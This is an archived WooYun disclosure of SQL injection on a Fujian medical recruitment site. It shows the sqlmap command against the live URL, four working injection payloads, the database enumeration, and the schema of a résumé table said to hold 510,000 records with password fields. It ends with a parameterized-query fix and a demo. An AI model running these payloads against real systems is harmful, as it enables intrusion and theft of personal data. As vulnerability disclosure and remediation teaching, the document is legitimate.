WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-10-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-11-20: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
As the title says.
The Fujian Provincial Medical Talent Service Center (Fujian Medical Talent Network, www.fjyyrc.cn) is the talent and employment service unit of the Fujian Provincial Food and Drug Administration. Since its founding in 2002 it has provided nationwide exchange for more than 200,000 medical and health professionals, and over 10,000 medical and health institutions have recruited through the Fujian Medical Talent Network with good results.

Injection point:
http://www.fjyyrc.com/vipcxchk.asp
sqlmap.py -u "http://www.fjyyrc.com/vipcxchk.asp" --data "zt=88952634" --level 3 --risk 3

POST parameter 'zt' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 165 HTTP(s) requests:
---
Parameter: zt (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: zt=-8890' OR 1027=1027 AND 'WqRH'='WqRH

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: zt=88952634' AND 7490=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (7490=7490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'OMUT'='OMUT

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: zt=88952634';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: zt=88952634' AND 6112=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'ccxw'='ccxw
---
[00:39:53] [INFO] testing Microsoft SQL Server
[00:39:54] [INFO] confirming Microsoft SQL Server
[00:39:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[00:39:57] [INFO] fetching database names
[00:39:57] [INFO] the SQL query used returns 5 entries
[00:39:58] [INFO] retrieved: master
[00:39:58] [INFO] retrieved: model
[00:40:01] [INFO] retrieved: msdb
[00:40:01] [INFO] retrieved: tempdb
[00:40:01] [INFO] retrieved: webfjyyrc
available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] webfjyyrc
Databases:

Data volume, 51W (510,000) résumés:

Résumé details:
Database: webfjyyrc
Table: person66
[114 columns]
+--------------------+---------------+
| Column             | Type          |
+--------------------+---------------+
| administrator      | bit           |
| age                | tinyint       |
| availNotice        | nvarchar      |
| availOpts          | tinyint       |
| beizhu             | ntext         |
| birthday           | tinyint       |
| birthmonth         | tinyint       |
| birthyear          | smallint      |
| comid              | nvarchar      |
| daiyuyaoqiu        | nvarchar      |
| dianaLevel         | tinyint       |
| dianhua            | nvarchar      |
| dlcs               | int           |
| dlsj               | smalldatetime |
| fazhanfangxiang    | ntext         |
| gerenzhuye         | nvarchar      |
| grtype             | tinyint       |
| huji               | char          |
| huji1              | nvarchar      |
| hunyin             | tinyint       |
| id                 | int           |
| ip                 | nvarchar      |
| JFbirthday         | nvarchar      |
| JFcomName          | nvarchar      |
| JFcomSort          | nvarchar      |
| JFcomTar           | nvarchar      |
| JFdaiyu            | nvarchar      |
| JFdianhua          | nvarchar      |
| JFdizhi            | nvarchar      |
| JFdrzw             | nvarchar      |
| JFeduTime          | nvarchar      |
| JFeng              | nvarchar      |
| JFetc              | ntext         |
| JFetcJN            | ntext         |
| JFetclan1          | nvarchar      |
| JFetclan2          | nvarchar      |
| JFetcReq           | ntext         |
| JFgzjy             | ntext         |
| JFgzms             | ntext         |
| JFhkszd            | nvarchar      |
| JFhuji             | nvarchar      |
| JFhunyin           | nvarchar      |
| JFid               | int           |
| JFjobid1           | nvarchar      |
| JFjobid2           | nvarchar      |
| JFjsj              | ntext         |
| JFjsj0             | ntext         |
| JFlan              | nvarchar      |
| JFlzyy             | ntext         |
| JFmqszd            | nvarchar      |
| JFqq               | nvarchar      |
| JFsex              | nvarchar      |
| JFshengao          | nvarchar      |
| JFview             | tinyint       |
| JFxqzw             | nvarchar      |
| JFxueli            | nvarchar      |
| JFxueli2           | nvarchar      |
| JFxwdq             | nvarchar      |
| JFxwgw             | nvarchar      |
| JFzhengshu         | nvarchar      |
| JFzhicheng         | nvarchar      |
| jiaoyubeijing      | ntext         |
| jinengzhuanchang   | ntext         |
| jingyan            | tinyint       |
| jingyanshuoming    | ntext         |
| jlbm               | bit           |
| jobid              | varchar       |
| jsjshuiping        | tinyint       |
| l_OneAbility       | tinyint       |
| l_twoAbility       | tinyint       |
| language_one       | tinyint       |
| language_two       | tinyint       |
| llcs               | int           |
| lxbm               | bit           |
| mandarinLevel      | tinyint       |
| mbsys              | tinyint       |
| minzu              | char          |
| name               | char          |
| Negotiable         | tinyint       |
| otherLanguage      | varchar       |
| password           | nvarchar      |
| password2          | nvarchar      |
| photo              | char          |
| photopb            | tinyint       |
| phototre           | tinyint       |
| pingjia            | ntext         |
| pr                 | int           |
| provideHouseNeeded | tinyint       |
| qq                 | nvarchar      |
| s_PWL1             | nvarchar      |
| s_PWL2             | char          |
| s_PWL3             | char          |
| selectedjob1       | nvarchar      |
| shengao            | smallint      |
| tj                 | tinyint       |
| tjr                | nvarchar      |
| useremail          | nvarchar      |
| username           | nvarchar      |
| workdata           | smallint      |
| worktype           | tinyint       |
| x_suozaidi         | char          |
| x_suozaidi1        | nvarchar      |
| xgsj               | smalldatetime |
| xingbie            | bit           |
| xueli              | tinyint       |
| xuexiao            | nvarchar      |
| yanzheng           | tinyint       |
| zazhi              | bit           |
| zcdata             | smalldatetime |
| zhengshu1          | char          |
| zhengshu2          | char          |
| zhengshu3          | char          |
| zhengshutre        | tinyint       |
| zhuanye            | nvarchar      |
+--------------------+---------------+
DBA privileges; the current database user is sa:
Fix: use parameterized queries instead of concatenating the request parameter into the SQL string.
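To make the fix concrete, here is an added example (not code from the report or from the fjyyrc.com site, whose vipcxchk.asp source is not on the page). It assumes the vulnerable page builds its lookup by splicing the POST parameter zt into a WHERE clause, and it uses an in-memory SQLite table as a stand-in for webfjyyrc.dbo.person66 so it runs offline. The constructed rows and column set are illustrative. The concatenated version is fed the first boolean-based payload sqlmap reported, and the parameterized version receives the same bytes; only the former lets the payload rewrite the query.

```python
import sqlite3

# Constructed sample rows standing in for a few columns of person66 (the real
# table has 114 columns; only id, username and a hypothetical 'zt' column are used).
SAMPLE_ROWS = [
    (1, "alice", "membership-1"),
    (2, "bob", "membership-2"),
    (3, "carol", "membership-3"),
]

# First boolean-based payload from the sqlmap output on this page (the value of zt,
# without the "zt=" prefix).
BOOLEAN_PAYLOAD = "-8890' OR 1027=1027 AND 'WqRH'='WqRH"


def open_sample_db():
    """Create the stand-in table in memory and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE person66 (id INTEGER, username TEXT, zt TEXT)")
    conn.executemany("INSERT INTO person66 VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_concatenated(conn, zt):
    """Assumed vulnerable shape: the request value becomes part of the SQL text.

    With the boolean payload the WHERE clause turns into
    zt = '-8890' OR 1027=1027 AND 'WqRH'='WqRH', which is true for every row.
    """
    sql = "SELECT id, username FROM person66 WHERE zt = '" + zt + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, zt):
    """Fixed shape: a placeholder in the SQL text, the value passed separately.

    The driver never parses the value as SQL, so the payload is only ever
    compared as a literal string against the zt column and matches nothing.
    """
    sql = "SELECT id, username FROM person66 WHERE zt = ?"
    return conn.execute(sql, (zt,)).fetchall()


if __name__ == "__main__":
    db = open_sample_db()
    print("concatenated  :", lookup_concatenated(db, BOOLEAN_PAYLOAD))
    print("parameterized :", lookup_parameterized(db, BOOLEAN_PAYLOAD))
    print("legit lookup  :", lookup_parameterized(db, "membership-2"))
```

The same placeholder-and-separate-value pattern applies to classic ASP on SQL Server through ADODB.Command parameters; the point of the example is that the fix is a change in how the query is sent to the database, not input filtering, so the stacked-query and time-based payloads in the sqlmap output are neutralised by the same change.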
Vendor response: unable to contact the vendor, or the vendor actively declined.